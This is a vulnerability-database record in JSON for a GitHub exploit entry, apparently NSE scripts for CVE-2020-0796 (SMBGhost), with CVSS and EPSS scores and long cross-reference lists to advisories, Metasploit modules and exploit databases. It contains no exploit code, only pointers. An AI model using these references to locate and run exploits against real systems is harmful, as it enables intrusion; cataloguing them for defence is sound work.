DATABASE RESOURCES PRICING ABOUT US

{"id": "F14BCE6F-3415-59C7-AC9D-A5D7ABE1BB8E", "vendorId": null, "type": "githubexploit", "bulletinFamily": "exploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "description": "# Contains Custom NSE scripts \n\n\n# CVE-2020-0796\nNSE script to d...", "published": "2020-03-11T17:51:29", "modified": "2022-03-23T17:15:09", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 10.0, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 6.0}, "href": "", "reporter": "", "references": [], "cvelist": ["CVE-2020-0796", "CVE-2020-1350", "CVE-2021-21972", "CVE-2021-21973", "CVE-2021-34473"], "immutableFields": [], "lastseen": "2022-03-23T18:18:47", "viewCount": 103, "enchantments": {"dependencies": {"references": [{"type": "akamaiblog", "idList": ["AKAMAIBLOG:BBE7670A93BC8AF70B2207E0CEF64EAA"]}, {"type": "attackerkb", "idList": ["AKB:116FDAE6-8C6E-473E-8D39-247560D01C09", "AKB:11E283FA-0ADF-470B-87F5-A1FF90AC7873", "AKB:1DE0ADEC-8107-491A-BC8F-DCC3BF6EB3AB", "AKB:27DB2819-5039-4831-815A-798764488B88", "AKB:462BB7BE-5D1C-4847-AE1A-07B008F34C9D", "AKB:72CB57AD-D32C-43D3-86B8-F8B617707C5B", "AKB:A2C0FB81-B0C3-4850-9393-E52427779FBF", "AKB:B3E0B6D7-814D-4DB3-BA2B-8C2F79B7BE7B", "AKB:BDCF4DDE-714E-40C0-B4D9-2B4ECBAD31FF", "AKB:C4CD066B-E590-48F0-96A7-FFFAFC3D23CC", "AKB:E85583CB-111D-4D95-80E5-4CD53BB1F952", "AKB:ED05CA72-27C8-4C22-BFF9-2AE3451C549C"]}, {"type": "avleonov", "idList": ["AVLEONOV:13BED8E5AD26449401A37E1273217B9A", "AVLEONOV:1ABE5F69187E5F9F8625DA462772F80C", "AVLEONOV:24538B1ED96269982136AA43998E5780", "AVLEONOV:4FCA3B316DF1BAA7BC038015245D9813", "AVLEONOV:6A714F9BC2BBE696D3586B2629169491", "AVLEONOV:7DAB33D28205885E8979C4C664958CDC", "AVLEONOV:B0F649A99B171AC3032AF71B1DCCFE34", "AVLEONOV:D8BE9238C3E35C438BC4D8515D78E548"]}, {"type": "canvas", "idList": ["SMBGHOST", "SMBGHOST_LPE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6D8B0D86C2C5A86632676E10E471547F"]}, {"type": "cert", "idList": ["VU:872016"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-0136", "CPAI-2020-0658", "CPAI-2021-0106", "CPAI-2021-0476"]}, {"type": "cisa", "idList": ["CISA:0A6DEB06CFB7BDA5A3D72E0F236C5665", "CISA:128CACDAC4A49084B5132404C3E20B9D", "CISA:2584F925B4D0F34C7EBE8E9D34FC72C7", "CISA:50FD88CEEFDE175A266C8EB09AC92D7D", "CISA:5FE14EDE9F5E20EB9536DC356A82AAB6", "CISA:72803FA1C7CD81E274A0417B0A34353E", "CISA:8C51810D4AACDCCDBF9D526B4C21660C", "CISA:9D38592E642AD30FA4BC435AC4FFC304", "CISA:CB32DB4C2EA92462F387E1DA6C08F57E"]}, {"type": "cve", "idList": ["CVE-2020-0796", "CVE-2020-1350", "CVE-2021-21972", "CVE-2021-21973", "CVE-2021-31196", "CVE-2021-31206", "CVE-2021-34473"]}, {"type": "exploitdb", "idList": ["EDB-ID:48216", "EDB-ID:48267", "EDB-ID:48537", "EDB-ID:49602", "EDB-ID:50056"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:162FCF5EA0445C77E29A0F6775C5E7F6", "EXPLOITPACK:CFD5A967D4C18FB68D3D775FE9AAAA38"]}, {"type": "fireeye", "idList": ["FIREEYE:FC60CAB5C936FF70E94A7C9307805695"]}, {"type": "githubexploit", "idList": ["0522E1EF-0AC6-5DD5-A6DA-6BF91F5A89C4", "0A015784-48D7-5DC1-9FB9-416A9BBEA6D5", "0AF42B8A-DF0D-58F8-AB60-9E7C63ED9EEB", "0C366CAA-5DE0-5E1E-98BD-503473AFAFA2", "0D23F068-44DE-5104-B4F1-A0E53C83D60F", "1B787DF3-D66A-5A51-AB8B-DA600B216482", "1D1C90C4-5D8F-58C4-B5AA-805F46862E47", "22C095F3-54B6-532B-AE10-73BEE3624D57", "23687103-A800-5907-929B-B3A41D121F1B", "243C313B-7F90-56EA-BE8E-35A8DFFAEDB2", "2A7F5F31-A737-556D-A869-05B87FD1F625", "2C47C88A-DA77-535C-9BCD-4A89D8B02384", "2D0AC1C7-F656-5D6B-9FC2-79525014BE1E", "2F2D8C81-E148-5A14-8750-9403AFEB21A8", "3738D917-F6B1-5AFF-8F77-DA5EF5276D89", "37D3D343-97C5-5C12-8595-042E337E31C0", "387719E9-0938-5546-95DA-D88EC7E3FF13", "39EADA2B-CE50-555B-910E-D3B77640C464", "3DF3AA17-94C8-5E17-BCB8-F806D1746CDF", "3F8F5249-E116-59FA-9CE1-74380DCC5D51", "441AE17C-8A7C-5FB8-AE3C-667A15B0265F", "46CBB13F-0CFD-5D36-BDAB-38B8D306B155", "479FD3C0-1269-5BC3-BD67-CDEE0485485A", "484522F4-99E8-5FCE-9CB6-2DB46070E529", "4A6EBCA8-D007-5E59-94B8-7BDA780D94B5", "4A85B104-7AB3-5334-BEAB-DD8CB273CBAF", "4AC49DB9-A784-561B-BF92-94209310B51B", "4AE4DA23-9B19-512A-AEC4-4DDC3C1650FC", "502CC8C9-71B8-5BB1-9D39-D1EAA861ABDA", "50618611-3CA9-5185-8ED3-53532D99D4B7", "52AA3134-2731-589A-BE46-26ABB8039FE2", "52C8ABEA-CBB9-5201-A615-BBC5769F9BC3", "55989E2C-3C33-5EB8-AADF-9B52B80F48D6", "5711B5D3-F257-5128-8C1A-908EACEAEC29", "5F6BE6F7-C220-5BDD-BE92-A5156F21A1B2", "5FB67B52-8BE9-5EE4-B573-CF49FD1579A5", "626E6774-0ACC-594C-BB61-E89F8F034B11", "64EF6553-4D22-526B-A1CC-09212DBD7625", "69E38911-1BFE-5166-9FD4-EC8F4997E3DE", "6B607D21-8F2D-50F9-8E60-BC95F2E252E1", "6BCA07B7-CE6D-5F8C-9F75-D9C7E4B072FE", "6F29B32B-8480-51E3-8B87-96FBE89C9ADD", "709F50E2-7719-5BDB-ABBF-7CF8A820C46F", "730EEC4F-BE81-5690-BA8D-B89482C5C3D0", "7B41BE78-EA76-5BF3-A0BC-250C3D753626", "7B8853FF-7CB4-5F4D-B185-FE434458F43D", "935331CB-5C0B-5059-BAC4-383651C26C94", "93EEDE73-1DB4-5905-BCAB-CDC6F98831CD", "9B986515-0778-5365-8693-2669FC74128A", "9DE76D04-93D7-5923-9AE3-457D591197D6", "A0F56F7F-FBEC-52A7-8D05-19E0EF3E860F", "A37C8010-D2C6-52F5-9079-96E8A538B6CA", "B1274C64-524E-5AAB-9D50-AC7043563B81", "B3DDE0DD-F0B0-542D-8154-F61DCD2E49D9", "BDCD16BE-ECED-5F2A-994A-FBF6539639ED", "C8967016-587F-5098-AD59-ED5BF752FD5A", "C96C8DD1-344C-5476-85AC-6D2865A5C00F", "C98B31E5-B85D-50EE-9596-F00F1B89A800", "CB69BCC3-2317-5740-8B01-4F6F0D320AC3", "D359E448-87C6-5DAB-AC08-9E7782F4EBD1", "D4220876-A611-59AE-8262-07797542DAB9", "D4A83665-CEF3-5877-9DA4-B03A23BF7461", "D6044381-6C6F-56BC-81B3-86E4B5FC5200", "D7ADE5F6-D414-5DF2-AEC2-92FB32E6041F", "DD3676BD-E792-5189-86EE-4765FF68EFCB", "DE92AD9C-F346-5416-A5F0-5AEC963C9F3B", "E458F533-4B97-51A1-897B-1AF58218F2BF", "E99EC1B8-78FB-51D7-A94A-F8B504DFBEF5", "F00E8BE4-12D2-5F5B-A9AA-D627780259FB", "F3CF4A79-402B-56C0-8689-1AF5EBFECF3F", "FA0B4B9E-5D12-55F9-9E66-FA9CF9AF1B72", "FA6C0B5A-E89D-54A7-B603-4D8095BF66DD", "FB0D7C2A-01EB-5929-A539-96230C17B90F", "FFF6ABA4-7461-5653-836A-79F11037A7FF"]}, {"type": "hivepro", "idList": ["HIVEPRO:09525E3475AC1C5F429611A90182E82F", "HIVEPRO:10B372979ED5F121D7A84FB66487023E", "HIVEPRO:186D6EE394314F861D57F4243E31E975", "HIVEPRO:92FF0246065B21E79C7D8C800F2DED76", "HIVEPRO:C0B03D521C5882F1BE07ECF1550A5F74", "HIVEPRO:DB06BB609FE1B4E7C95CDC5CB2A38B28", "HIVEPRO:E7F36EC1E4DCF018F94ECD22747B7093", "HIVEPRO:F2305684A25C735549865536AA4254BF"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20200716-01-DNS"]}, {"type": "ibm", "idList": ["425F5D6A5626B05313A3861482065BCFD009527D181E2BC17663ACBA680F983D"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:020B268DFC760B88704D35A6F4CF30D7"]}, {"type": "kaspersky", "idList": ["KLA11693", "KLA11863", "KLA11865", "KLA12224"]}, {"type": "kitploit", "idList": ["KITPLOIT:1370442080181927541", "KITPLOIT:3348929726444940519", "KITPLOIT:3440136498125856121", "KITPLOIT:3701426813255055656", "KITPLOIT:3872284907466902606", "KITPLOIT:4378915690459298496", "KITPLOIT:5374829754140275290", "KITPLOIT:5857572574369273543", "KITPLOIT:6298886136201302065", "KITPLOIT:6714457792986818120", "KITPLOIT:7720212798779518234", "KITPLOIT:7904361679234881900", "KITPLOIT:8455936192163161094"]}, {"type": "krebs", "idList": ["KREBS:1093D39181F7F724932AED0E8DA017A8", "KREBS:1A886B22AAF8ADC53874F0E126C5A96D", "KREBS:831FD0B726B800B2995A68BA50BD8BE3", "KREBS:A05C5DFD2D31CCAAE49C4FBA8C7469E4"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:42218FB85F05643E0B2C2C7D259EFEB5", "MALWAREBYTES:6A4862332586F98DA4761BE2B684752F", "MALWAREBYTES:B0F2474F776241731FE08EA7972E6239", "MALWAREBYTES:B830332817B5D5BEE99EF296E8EC7E2A", "MALWAREBYTES:B8C767042833344389F6158273089954"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-WINDOWS-HTTP-EXCHANGE_PROXYSHELL_RCE-", "MSF:EXPLOIT-WINDOWS-LOCAL-CVE_2020_0796_SMBGHOST-", "MSF:EXPLOIT-WINDOWS-SMB-CVE_2020_0796_SMBGHOST-"]}, {"type": "mmpc", "idList": ["MMPC:42ECD98DCF925DC4063DE66F75FB5433", "MMPC:4A6B394DCAF12E05136AE087248E228C", "MMPC:D6D537E875C3CBD84822A868D24B31BA", "MMPC:E537BA51663A720821A67D2A4F7F7F0E"]}, {"type": "mscve", "idList": ["MS:ADV200005", "MS:CVE-2020-0796", "MS:CVE-2020-1350", "MS:CVE-2021-31196", "MS:CVE-2021-31206", "MS:CVE-2021-34473"]}, {"type": "mskb", "idList": ["KB4551762", "KB5001779"]}, {"type": "msrc", "idList": ["MSRC:79080D1EA83C3BB4689C763E5FACBDB5"]}, {"type": "mssecure", "idList": ["MSSECURE:42ECD98DCF925DC4063DE66F75FB5433", "MSSECURE:4A6B394DCAF12E05136AE087248E228C", "MSSECURE:7DAEE35F7BA48355264AFE712E62E793", "MSSECURE:D6D537E875C3CBD84822A868D24B31BA", "MSSECURE:E537BA51663A720821A67D2A4F7F7F0E"]}, {"type": "myhack58", "idList": ["MYHACK58:62202097543"]}, {"type": "nessus", "idList": ["EXCHANGE_PROXYSHELL.NBIN", "MICROSOFT_SMB_CVE-2020-0796.NASL", "MS_DNS_CVE-2020-1350.NASL", "SMB_MICROSOFT_WINDOWS_ADV200005.NASL", "SMB_MICROSOFT_WINDOWS_ADV200005_REMOTE.NASL", "SMB_NT_MS20_JUL_DNS_CHECK.NASL", "SMB_NT_MS20_MAR_4551762.NASL", "SMB_NT_MS21_APR_EXCHANGE.NASL", "VMWARE_VCENTER_CVE-2021-21972.NBIN", "VMWARE_VCENTER_VMSA-2021-0002.NASL", "WEB_APPLICATION_SCANNING_113241", "WEB_APPLICATION_SCANNING_113243"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310816800", "OPENVAS:1361412562310817088", "OPENVAS:1361412562310817224", "OPENVAS:1361412562310817226", "OPENVAS:1361412562310817228", "OPENVAS:1361412562310817230", "OPENVAS:1361412562310817231", "OPENVAS:1361412562310817232"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156732", "PACKETSTORM:157110", "PACKETSTORM:161527", "PACKETSTORM:161590", "PACKETSTORM:161695", "PACKETSTORM:163268", "PACKETSTORM:163895"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:8FD1C9A0D76A3084445136A0275847C0"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:016288CBC518BC4CE318130A921071C2", "QUALYSBLOG:22A5C3C4F56D3B499B24DF2E1626F4C1", "QUALYSBLOG:8028F138635C78F91B08AB2CF72FA154", "QUALYSBLOG:9B7C3806B8C67809B298463FBE31A0A4", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "QUALYSBLOG:CAF5B766E6B0E6C1A5ADF56D442E7BB2", "QUALYSBLOG:DC0F3E59C4DA6EB885E6BCAB292BCA7D", "QUALYSBLOG:DE1FEC2B9B661D42DAA0BA398DBFD24E", "QUALYSBLOG:F343178EEC11B54CFAFBD0B4D505010B"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:03B1EB65D8A7CFE486943E2472225BA1", "RAPID7BLOG:076DBD838FD2726D9F20BCEAFC2D960D", "RAPID7BLOG:24E0BE5176F6D3963E1824AD4A55019E", "RAPID7BLOG:4B35B23167A9D5E016537F6A81E4E9D4", "RAPID7BLOG:5CDF95FB2AC31414FD390E0E0A47E057", "RAPID7BLOG:614648646663CF660156AD39ED9421B3", "RAPID7BLOG:7103223D85FA1742C265703CC8D3EE7C", "RAPID7BLOG:7B1DD656DC72802EE7230867267A5A16", "RAPID7BLOG:7F5516EB3D3811BAE47D74129049D93F", "RAPID7BLOG:B253581ECA2FCB1FA25D45B69A6D7AE5", "RAPID7BLOG:D47FB88807F2041B8820156ECFB85720", "RAPID7BLOG:D560044511D0D460EB8BD73E6B8C9EB7", "RAPID7BLOG:E36C557104ECB6E144C21C3C499B0492"]}, {"type": "securelist", "idList": ["SECURELIST:20C7BC6E3C43CD3D939A2E3EAE01D4C1", "SECURELIST:C540EBB7FD8B7FB9E54E119E88DB5C48", "SECURELIST:CE954DA57A5EE857B62F0E00D36A5003", "SECURELIST:D0FFA6E46D43B7A592C34676F2EF3EDB"]}, {"type": "seebug", "idList": ["SSV:99260"]}, {"type": "talosblog", "idList": ["TALOSBLOG:136C0DF46D16B7D21DD712BDD956BC41"]}, {"type": "thn", "idList": ["THN:0D80EEB03C07D557AA62E071C7A7C619", "THN:17F11846886656062FA1EA84D1C74534", "THN:1ED1BB1B7B192353E154FB0B02F314F4", "THN:4F010A66018968CA6DAA0432C00DAE10", "THN:5BE77895D84D1FB816C73BB1661CE8EB", "THN:71D3B9379166BDEEAEC59EE5E145C193", "THN:84E53E1CA489F43A3D68EC1B18D6C2E2", "THN:87AE96960D76D6C84D9CF86C2DDB837C", "THN:882595A940E5AB15E8B9C472154ACA45", "THN:90048C5D2E69F2E769EE053B3E1555AA", "THN:9FD8A70F9C17C3AF089A104965E48C95", "THN:C3B82BB0558CF33CFDC326E596AF69C4", "THN:DBFCCEBE2752BA05D9181D55D3477666", "THN:E95B6A75073DA71CEC73B2E4F0B13622", "THN:F1DFBF3E8E6E5F3CD1282E08B3C3E35D", "THN:FA40708E1565483D14F9A31FC019FCE1", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "threatpost", "idList": ["THREATPOST:0EAD358006302B8EB3637C22334E13DC", "THREATPOST:12364EEB82CF1DBF8D357DF9FBB64126", "THREATPOST:1586A7AFAD80F6833B8727AD8E03DB79", "THREATPOST:2243706D17F2A1E930A00F49D8E30720", "THREATPOST:2AAD8D184B893593E4E3B11FE31F97B3", "THREATPOST:363C332F7046A481C24C7172C55CF758", "THREATPOST:38C104BCE62E9E24AEFF60D68D7C50BE", "THREATPOST:4B2E19CAF27A3EFBCB2F777C6E528317", "THREATPOST:52923238811C7BFD39E0529C85317249", "THREATPOST:604B67FD6EFB0E72DDD87DF07C8F456D", "THREATPOST:736F24485446EFF3B3797B31CE9DAF1D", "THREATPOST:7E6D2DBA11B2CCCE264B0982306FBEB1", "THREATPOST:836083DB3E61D979644AE68257229776", "THREATPOST:83C349A256695022C2417F465CEB3BB2", "THREATPOST:96E775E045D4DF55CC1B9A3AA0C28F70", "THREATPOST:98D815423018872E6E596DAA8131BF3F", "THREATPOST:A7995232CE91305C94B84BB400B1EA34", "THREATPOST:AD8A075328874910E8DCBC149A6CA284", "THREATPOST:B2D0023D9A73CEE9C328A0927149D5B2", "THREATPOST:EC36CC2F4E891C402B4EBDBE9D92F9A8", "THREATPOST:EDFBDF12942A6080DE3FAE980A53F496", "THREATPOST:F7C6EEE7081716FAE624B70FD91C4225"]}, {"type": "vmware", "idList": ["VMSA-2021-0002"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:1493380EEC54B493CC22B4FA116139BB", "WALLARMLAB:7A0E7E3752712070F3E75CEF26AC2CC0"]}, {"type": "zdi", "idList": ["ZDI-21-821"]}, {"type": "zdt", "idList": ["1337DAY-ID-34097", "1337DAY-ID-34105", "1337DAY-ID-34171", "1337DAY-ID-34206", "1337DAY-ID-34504", "1337DAY-ID-35863", "1337DAY-ID-35879", "1337DAY-ID-35912", "1337DAY-ID-36472", "1337DAY-ID-36667"]}]}, "score": {"value": 8.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:116FDAE6-8C6E-473E-8D39-247560D01C09", "AKB:1DE0ADEC-8107-491A-BC8F-DCC3BF6EB3AB", "AKB:27DB2819-5039-4831-815A-798764488B88", "AKB:BDCF4DDE-714E-40C0-B4D9-2B4ECBAD31FF", "AKB:C4CD066B-E590-48F0-96A7-FFFAFC3D23CC", "AKB:E85583CB-111D-4D95-80E5-4CD53BB1F952", "AKB:ED05CA72-27C8-4C22-BFF9-2AE3451C549C"]}, {"type": "avleonov", "idList": ["AVLEONOV:4FCA3B316DF1BAA7BC038015245D9813", "AVLEONOV:6A714F9BC2BBE696D3586B2629169491", "AVLEONOV:D8BE9238C3E35C438BC4D8515D78E548"]}, {"type": "canvas", "idList": ["SMBGHOST", "SMBGHOST_LPE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6D8B0D86C2C5A86632676E10E471547F"]}, {"type": "cert", "idList": ["VU:872016"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-0136", "CPAI-2020-0658", "CPAI-2021-0106", "CPAI-2021-0476"]}, {"type": "cisa", "idList": ["CISA:0A6DEB06CFB7BDA5A3D72E0F236C5665", "CISA:2584F925B4D0F34C7EBE8E9D34FC72C7", "CISA:50FD88CEEFDE175A266C8EB09AC92D7D", "CISA:72803FA1C7CD81E274A0417B0A34353E", "CISA:8C51810D4AACDCCDBF9D526B4C21660C", "CISA:9D38592E642AD30FA4BC435AC4FFC304"]}, {"type": "cve", "idList": ["CVE-2020-0796", "CVE-2020-1350", "CVE-2021-34473"]}, {"type": "exploitdb", "idList": ["EDB-ID:48216", "EDB-ID:48267", "EDB-ID:48537"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:CFD5A967D4C18FB68D3D775FE9AAAA38"]}, {"type": "fireeye", "idList": ["FIREEYE:FC60CAB5C936FF70E94A7C9307805695"]}, {"type": "githubexploit", "idList": ["0522E1EF-0AC6-5DD5-A6DA-6BF91F5A89C4", "0AF42B8A-DF0D-58F8-AB60-9E7C63ED9EEB", "1B787DF3-D66A-5A51-AB8B-DA600B216482", "1D1C90C4-5D8F-58C4-B5AA-805F46862E47", "22C095F3-54B6-532B-AE10-73BEE3624D57", "23687103-A800-5907-929B-B3A41D121F1B", "243C313B-7F90-56EA-BE8E-35A8DFFAEDB2", "2A7F5F31-A737-556D-A869-05B87FD1F625", "2C47C88A-DA77-535C-9BCD-4A89D8B02384", "2F2D8C81-E148-5A14-8750-9403AFEB21A8", "37D3D343-97C5-5C12-8595-042E337E31C0", "387719E9-0938-5546-95DA-D88EC7E3FF13", "479FD3C0-1269-5BC3-BD67-CDEE0485485A", "484522F4-99E8-5FCE-9CB6-2DB46070E529", "4A6EBCA8-D007-5E59-94B8-7BDA780D94B5", "52AA3134-2731-589A-BE46-26ABB8039FE2", "5F6BE6F7-C220-5BDD-BE92-A5156F21A1B2", "5FB67B52-8BE9-5EE4-B573-CF49FD1579A5", "6F29B32B-8480-51E3-8B87-96FBE89C9ADD", "709F50E2-7719-5BDB-ABBF-7CF8A820C46F", "7B8853FF-7CB4-5F4D-B185-FE434458F43D", "935331CB-5C0B-5059-BAC4-383651C26C94", "93EEDE73-1DB4-5905-BCAB-CDC6F98831CD", "9DE76D04-93D7-5923-9AE3-457D591197D6", "A0F56F7F-FBEC-52A7-8D05-19E0EF3E860F", "A37C8010-D2C6-52F5-9079-96E8A538B6CA", "BDCD16BE-ECED-5F2A-994A-FBF6539639ED", "C8967016-587F-5098-AD59-ED5BF752FD5A", "C96C8DD1-344C-5476-85AC-6D2865A5C00F", "CB69BCC3-2317-5740-8B01-4F6F0D320AC3", "D4A83665-CEF3-5877-9DA4-B03A23BF7461", "D6044381-6C6F-56BC-81B3-86E4B5FC5200", "D7ADE5F6-D414-5DF2-AEC2-92FB32E6041F", "DD3676BD-E792-5189-86EE-4765FF68EFCB", "DE92AD9C-F346-5416-A5F0-5AEC963C9F3B", "F3CF4A79-402B-56C0-8689-1AF5EBFECF3F", "FA0B4B9E-5D12-55F9-9E66-FA9CF9AF1B72", "FA6C0B5A-E89D-54A7-B603-4D8095BF66DD", "FB0D7C2A-01EB-5929-A539-96230C17B90F", "FFF6ABA4-7461-5653-836A-79F11037A7FF"]}, {"type": "hivepro", "idList": ["HIVEPRO:C0B03D521C5882F1BE07ECF1550A5F74"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20200716-01-DNS"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:020B268DFC760B88704D35A6F4CF30D7"]}, {"type": "kaspersky", "idList": ["KLA11693", "KLA11863", "KLA11865", "KLA12224"]}, {"type": "kitploit", "idList": ["KITPLOIT:1370442080181927541", "KITPLOIT:3348929726444940519", "KITPLOIT:3440136498125856121", "KITPLOIT:3449843613571411531", "KITPLOIT:3872284907466902606", "KITPLOIT:4378915690459298496", "KITPLOIT:5374829754140275290", "KITPLOIT:5857572574369273543", "KITPLOIT:6298886136201302065", "KITPLOIT:6714457792986818120", "KITPLOIT:7720212798779518234", "KITPLOIT:7904361679234881900", "KITPLOIT:8455936192163161094"]}, {"type": "krebs", "idList": ["KREBS:1093D39181F7F724932AED0E8DA017A8", "KREBS:1A886B22AAF8ADC53874F0E126C5A96D", "KREBS:831FD0B726B800B2995A68BA50BD8BE3", "KREBS:A05C5DFD2D31CCAAE49C4FBA8C7469E4"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:42218FB85F05643E0B2C2C7D259EFEB5", "MALWAREBYTES:6A4862332586F98DA4761BE2B684752F"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/HTTP/EXCHANGE_PROXYSHELL_RCE/"]}, {"type": "mmpc", "idList": ["MMPC:4A6B394DCAF12E05136AE087248E228C", "MMPC:D6D537E875C3CBD84822A868D24B31BA", "MMPC:E537BA51663A720821A67D2A4F7F7F0E"]}, {"type": "mscve", "idList": ["MS:ADV200005", "MS:CVE-2020-0796", "MS:CVE-2020-1350", "MS:CVE-2021-34473"]}, {"type": "mskb", "idList": ["KB4551762", "KB5001779"]}, {"type": "msrc", "idList": ["MSRC:79080D1EA83C3BB4689C763E5FACBDB5"]}, {"type": "mssecure", "idList": ["MSSECURE:4A6B394DCAF12E05136AE087248E228C", "MSSECURE:7DAEE35F7BA48355264AFE712E62E793", "MSSECURE:D6D537E875C3CBD84822A868D24B31BA", "MSSECURE:E537BA51663A720821A67D2A4F7F7F0E"]}, {"type": "myhack58", "idList": ["MYHACK58:62202097543"]}, {"type": "nessus", "idList": ["MICROSOFT_SMB_CVE-2020-0796.NASL", "SMB_MICROSOFT_WINDOWS_ADV200005_REMOTE.NASL", "SMB_NT_MS20_MAR_4551762.NASL", "VMWARE_VCENTER_CVE-2021-21972.NBIN"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310816800", "OPENVAS:1361412562310817088", "OPENVAS:1361412562310817224", "OPENVAS:1361412562310817226", "OPENVAS:1361412562310817228", "OPENVAS:1361412562310817230", "OPENVAS:1361412562310817231", "OPENVAS:1361412562310817232"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156732", "PACKETSTORM:157110", "PACKETSTORM:161695", "PACKETSTORM:163895"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:8FD1C9A0D76A3084445136A0275847C0"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:016288CBC518BC4CE318130A921071C2", "QUALYSBLOG:22A5C3C4F56D3B499B24DF2E1626F4C1", "QUALYSBLOG:8028F138635C78F91B08AB2CF72FA154", "QUALYSBLOG:9B7C3806B8C67809B298463FBE31A0A4", "QUALYSBLOG:F343178EEC11B54CFAFBD0B4D505010B"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:03B1EB65D8A7CFE486943E2472225BA1", "RAPID7BLOG:4B35B23167A9D5E016537F6A81E4E9D4", "RAPID7BLOG:5CDF95FB2AC31414FD390E0E0A47E057", "RAPID7BLOG:614648646663CF660156AD39ED9421B3", "RAPID7BLOG:7B1DD656DC72802EE7230867267A5A16", "RAPID7BLOG:B253581ECA2FCB1FA25D45B69A6D7AE5"]}, {"type": "securelist", "idList": ["SECURELIST:D0FFA6E46D43B7A592C34676F2EF3EDB"]}, {"type": "seebug", "idList": ["SSV:99260"]}, {"type": "talosblog", "idList": ["TALOSBLOG:136C0DF46D16B7D21DD712BDD956BC41"]}, {"type": "thn", "idList": ["THN:17F11846886656062FA1EA84D1C74534", "THN:5BE77895D84D1FB816C73BB1661CE8EB", "THN:882595A940E5AB15E8B9C472154ACA45", "THN:90048C5D2E69F2E769EE053B3E1555AA", "THN:9FD8A70F9C17C3AF089A104965E48C95", "THN:DBFCCEBE2752BA05D9181D55D3477666", "THN:F1DFBF3E8E6E5F3CD1282E08B3C3E35D", "THN:FA40708E1565483D14F9A31FC019FCE1"]}, {"type": "threatpost", "idList": ["THREATPOST:0EAD358006302B8EB3637C22334E13DC", "THREATPOST:12364EEB82CF1DBF8D357DF9FBB64126", "THREATPOST:1586A7AFAD80F6833B8727AD8E03DB79", "THREATPOST:4B2E19CAF27A3EFBCB2F777C6E528317", "THREATPOST:7E6D2DBA11B2CCCE264B0982306FBEB1", "THREATPOST:96E775E045D4DF55CC1B9A3AA0C28F70", "THREATPOST:98D815423018872E6E596DAA8131BF3F", "THREATPOST:A7995232CE91305C94B84BB400B1EA34", "THREATPOST:B2D0023D9A73CEE9C328A0927149D5B2", "THREATPOST:EC36CC2F4E891C402B4EBDBE9D92F9A8", "THREATPOST:F7C6EEE7081716FAE624B70FD91C4225"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:7A0E7E3752712070F3E75CEF26AC2CC0"]}, {"type": "zdi", "idList": ["ZDI-21-821"]}, {"type": "zdt", "idList": ["1337DAY-ID-34097", "1337DAY-ID-34105", "1337DAY-ID-34171", "1337DAY-ID-35863", "1337DAY-ID-35879", "1337DAY-ID-35912"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2020-0796", "epss": "0.973420000", "percentile": "0.997760000", "modified": "2023-03-17"}, {"cve": "CVE-2020-1350", "epss": "0.924630000", "percentile": "0.984010000", "modified": "2023-03-18"}, {"cve": "CVE-2021-21972", "epss": "0.973850000", "percentile": "0.998170000", "modified": "2023-03-17"}, {"cve": "CVE-2021-21973", "epss": "0.601650000", "percentile": "0.971690000", "modified": "2023-03-17"}, {"cve": "CVE-2021-34473", "epss": "0.974090000", "percentile": "0.998460000", "modified": "2023-03-17"}], "vulnersScore": 8.2}, "_state": {"dependencies": 1660004461, "score": 1698843382, "epss": 1679157345}, "_internal": {"score_hash": "a0733ab2349a0dad7885f821690f2add"}, "privateArea": 1}

